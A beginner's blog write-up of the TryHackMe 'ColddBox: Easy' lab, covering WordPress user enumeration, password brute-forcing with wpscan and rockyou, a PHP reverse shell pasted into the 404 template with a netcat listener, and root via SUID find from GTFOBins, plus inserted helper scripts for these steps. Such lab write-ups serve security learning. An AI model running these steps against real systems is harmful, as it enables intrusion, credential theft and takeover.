Try Hack Me (ColddBox:Easy)

Lolokidd
8 min read · Jan 8, 2021

C0lddBox Writeup.

The box can be found here : https://tryhackme.com/room/colddboxeasy

First time, so be nice (I’m a noob, remember).

ENUMERATION

Being on a box, I don’t hesitate, I go for a full scan (and an aggressive one at that):

Aggressive Nmap

To have something to work with while waiting, a nice and simple nmap :

Port 80 open, you might also have simply pasted the IP address in your browser to check that (that’s what I do most of the time anyway) :

Nice webpage, looks familiar…

Indeed!

That will probably give us something to work with.

What can you do when you get there?

Have a look around 😊 Check the source code, box makers like to hide clues in there… sometimes ^^

I’ll leave you to it, have a look, there’s not much here… But still, one clue to what we might be able to do later: the theme used by WordPress (twentyfifteen).

Next, if you don’t already know where to look, having done too many THM boxes, you’ll go next for dirbuster / gobuster to find what’s there to be found 😊

I’ve been personally using gobuster lately, so here’s what I used.

Have a look at the help page if needed. I like adding -x to check for specific file extensions; here, php. The -t 200 bumps up the number of threads: being on a box, I want it faaaaaaast 😊

Here’s the result :

(Ok, I’m confused at the moment, my full nmap scan just ended, and last night I had another open port, so let me have another go. Here’s the result anyway, we’ve got a version for WP, which you would have got faster without the -p- tag here…)

OK. Can’t explain why, maybe something on my end, but I remember the port range, so here you go: you should get an SSH port open with the full nmap scan launched at the beginning (the -p- flag).

That’s for future exploitation, since — SPOILER — I’m not actually using SSH today ^^

Anyway, back to our Gobuster result.

The first thing smart and curious people would do, is have a look at this hidden folder…

I’m not smart, just curious, so I started with what I know, the wp-login.php page. Let me show you 😊

Use your browser to get there :

A classic WordPress login page. If you’re not familiar with it, now’s the time to discover the WPSCAN tool included in Kali!

This tool is really powerful, so I advise having a look at the help ‘wpscan -h’

You can run it simply with “wpscan --url BOXIPADDRESS”. You’ll get several results, indicating whether this is a vulnerable version.

So let’s continue enumeration. We’ll check if we can get usernames.

And we can!

There you go, you get potential usernames:

I’m not paying attention to the first one, because only hugo, philip and c0ldd are confirmed.

So let’s put them in a list! Choose your text editor, save your file. Mine is named ‘user’

Now, we’ve got all we need to start bruteforcing WP and guess the passwords!

But first…

Let’s have a look at that hidden folder!

If you go at this address (found thanks to gobuster) BOXIPADDRESS/hidden you get …. The users 😊

That was much simpler right? But now you know how to use WPSCAN ^^

FOOTHOLD

Moving on, we’ve now something to work with to try and log into wordpress!

We’ll continue using WPSCAN. For that, we’re using the ‘user’ file with the usernames, and a password list, the classic ‘rockyou.txt’ available on Kali (/usr/share/wordlists/rockyou.txt, gzipped on a fresh install).

Here’s what the command will look like. It will take a few minutes to give you a result :
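The user-list step and the password attack, as an added example that is not part of the original writeup. The wpscan output embedded below is constructed to resemble a saved ‘--enumerate u’ run (the real output has more sections); the script keeps only the accounts wpscan marked as confirmed, which is the same filtering the text applies by hand, and the wpscan commands in the comments are the ones that would run against a live target (BOXIPADDRESS is a placeholder).

```shell
#!/bin/sh
# Added example, not the writeup's own commands.
# Live commands this script stands in for:
#   wpscan --url http://BOXIPADDRESS --enumerate u -o wpscan-users.txt
#   wpscan --url http://BOXIPADDRESS -U user -P /usr/share/wordlists/rockyou.txt
set -eu

# Constructed sample in the style of a wpscan user-enumeration run.
SAMPLE_WPSCAN_OUTPUT='[+] WordPress version 4.1.31 identified
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Emoji Settings (Passive Detection)

[i] User(s) Identified:

[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
'

# confirmed_users: read wpscan output on stdin, print one confirmed username
# per line. Only the "User(s) Identified" section is considered, because the
# version-detection section above it also prints "Confirmed By" lines.
confirmed_users() {
    awk '
        /User\(s\) Identified/ { in_users = 1; next }
        in_users && /^\[\+\] /  { name = substr($0, 5); next }
        in_users && /Confirmed By:/ && name != "" { print name; name = "" }
    '
}

# write_user_list OUTFILE: build the file handed to wpscan -U from the sample.
write_user_list() {
    printf '%s' "$SAMPLE_WPSCAN_OUTPUT" | confirmed_users > "$1"
    echo "$(wc -l < "$1" | tr -d ' ') confirmed users written to $1"
}

# Usage: write_user_list user
```

Unconfirmed names (here “the cold in person”, which only came from the RSS feed) are dropped, so the password attack does not waste rockyou.txt on an account that may not exist.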

Here’s the password! Oh wait…

Yes, I’m mean, I hid the password. You’ll have to run the tool 😊 This time, I stopped it before it actually displayed the password, and it had found it anyway. So if you get nothing after 5 minutes, try stopping the tool (Ctrl +C) and hope for the best! Otherwise, be patient ^^

Now, you can login on the wp-login.php page!

You get to the WordPress admin page.

There might be several things to do here, I only know one, so that’s where I went without thinking.

You see several links on the left. The one that matters is the theme editor: an administrator can edit the theme’s PHP files straight from the dashboard, so you can drop your own code, a reverse shell, into one of them and have the server run it. This is a standard WordPress feature rather than a bug of this old version, which is why hardening guides recommend setting DISALLOW_FILE_EDIT in wp-config.php to switch it off.

Here’s how you can do it : in Appearance — Editor you can (and will) modify this page for example :

The 404 template! We’ll modify that, ask for a non-existing web page on the server so we call the 404 error page, which will in fact launch our reverse shell… easy, right?

First, find a PHP reverse shell. Why PHP? Because, as you can see in the screenshot above, the page is actually 404.php, so whatever we paste there will be executed by the server’s PHP interpreter.

There are reverse shells on the web (look for Pentestmonkey for instance) or in Kali! Here, I’ll use the one in Kali (/usr/share/webshells/php/php-reverse-shell.php, actually the same one you’ll find on the web):

Now, let’s edit it, so we ask it to connect back to us! You have to change the $ip IP address it connects to, which will be the one of your THM VM. I’m using the AttackBox at the moment; you’ll find yours with ip a (if you’re on the VPN instead, take the tun0 address).

You can modify the port if you want to, I’ll leave it to 1234.

Save your modified shell, and be ready to copy/paste it in wordpress! To make that easy, I use Sublime Text. Choose whatever you like to display your code and be able to copy/paste it!

Once this is done, get back to wordpress :

Paste it here, to modify your 404 template page. Don’t forget to click Update File below !

Almost there!

Time to set up your listener now, to get your connection. Open a terminal, and have Netcat listen on the port set in your reverse shell: here, 1234 (nc -lvnp 1234).

Now, get back on the website, and call a page which you know doesn’t exist. The app will launch the classic 404 error page, which you just modified to a reverse shell! This should connect back to your NC listener.
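The preparation steps above (edit the shell’s callback address and port, start the listener, trigger the 404 page), as an added example that is not part of the original writeup. The two-line stub written by write_stub is a constructed imitation of the header of pentestmonkey’s php-reverse-shell.php; the real file is much longer and is what you would actually paste into 404.php. The IP, port and interface name are placeholders.

```shell
#!/bin/sh
# Added example, not the writeup's own commands.
set -eu

# write_stub FILE: constructed stand-in for the top of php-reverse-shell.php.
# On Kali the real file is /usr/share/webshells/php/php-reverse-shell.php.
write_stub() {
    cat > "$1" <<'EOF'
<?php
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
EOF
}

# patch_reverse_shell SRC DST IP PORT: copy SRC to DST with the callback
# address and port rewritten, and fail if either line was not found, so a
# shell that would silently call back to 127.0.0.1 never gets pasted.
patch_reverse_shell() {
    src=$1; dst=$2; ip=$3; port=$4
    sed -e "s/^\\\$ip = '[^']*';/\$ip = '$ip';/" \
        -e "s/^\\\$port = [0-9]*;/\$port = $port;/" "$src" > "$dst"
    grep -qF "\$ip = '$ip';" "$dst" || { echo "\$ip line not patched" >&2; return 1; }
    grep -qF "\$port = $port;" "$dst" || { echo "\$port line not patched" >&2; return 1; }
}

# Typical flow (addresses assumed; tun0 is the THM VPN interface, on the
# AttackBox use the address shown by 'ip a' instead):
#   ATTACKER=$(ip -4 -o addr show tun0 | awk '{print $4}' | cut -d/ -f1)
#   patch_reverse_shell /usr/share/webshells/php/php-reverse-shell.php \
#       shell.php "$ATTACKER" 1234
#   # paste shell.php into Appearance > Editor > 404.php, click Update File
#   nc -lvnp 1234                                        # terminal 1: listener
#   curl -s http://BOXIPADDRESS/this-page-does-not-exist  # terminal 2: trigger
```

Any request for a missing page is enough to trigger the template, so curl works as well as clicking around in the browser; the request will appear to hang, because the PHP process is now busy talking to your listener.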

Let’s try that.

I added some characters to the URL of the October 2020 archives link on the left, and here we go, in our terminal:

We’re in!

You’re now connected as www-data (Apache). If you want to dig a bit, feel free! You should be able to pivot and log in as another user (we already know them), but I admit, I went straight for root!

I’d love to find other ways, but here’s what I’ve done. You’ll see there is a user, c0ldd, but we don’t have permission to read his files, including the user.txt.

So let’s have a look at how we can gain more permissions! Pick something, you can use LinEnum.sh for example, I did, but what I used can be found with this command :

find / -type f -perm -u=s 2>/dev/null

This lists files which have the SUID bit set, meaning they run with the privileges of the file’s owner rather than the caller’s. When the owner is root, any way of getting such a binary to execute a command of our choosing gives us a root shell.

Here, FIND looks promising 😊

Easiest way to hack your way in using SUID files, GTFObins!

Check the website for the command to run :

Read what you get for “FIND”

Execute the command. The GTFOBins entry is written for a local ./find, so either run it from the directory where find actually lives, or simply replace ./find with its full path (/usr/bin/find, which is what the output of the scan above shows).

What it looks like :

And… we’re done!
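The SUID hunt and the find trick, as an added example that is not part of the original writeup. list_suid is the scan from the text with the error output discarded; suid_exec is GTFOBins’ find entry with the command made a parameter so it can be checked with something harmless. The path /usr/bin/find is assumed.

```shell
#!/bin/sh
# Added example, not the writeup's own commands.
set -eu

# list_suid ROOT: regular files under ROOT with the setuid bit set. Directories
# we cannot read produce errors, which are discarded exactly as in the one-liner.
list_suid() {
    find "$1" -type f -perm -u=s 2>/dev/null
}

# suid_exec FIND_PATH CMD [ARGS...]: GTFOBins' SUID entry for find, generalised.
# -exec runs CMD with find's effective UID (root, if find is SUID root) and
# -quit stops after the first match, so the command runs exactly once.
suid_exec() {
    find_bin=$1; shift
    "$find_bin" . -exec "$@" \; -quit
}

# The actual privilege escalation, with the full path instead of ./find:
#   suid_exec /usr/bin/find /bin/sh -p
# The -p matters when /bin/sh is bash: without it, bash notices that the
# effective UID differs from the real one and drops back to www-data.
```

On this box /bin/sh is the system shell, so the -p flag costs nothing and saves you a confusing “still www-data” moment if it ever turns out to be bash.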

Feel free to now navigate to the usual flag locations, and even decode them for fun!

I didn’t even take the time to connect as c0ldd, I suppose there’s a way, so that means a bit more fun to have with this box!

Hope you like my first writeup ever 😊

Thanks @C0ldd__ for the box!

À plus les hackers,

@l0l0kidd
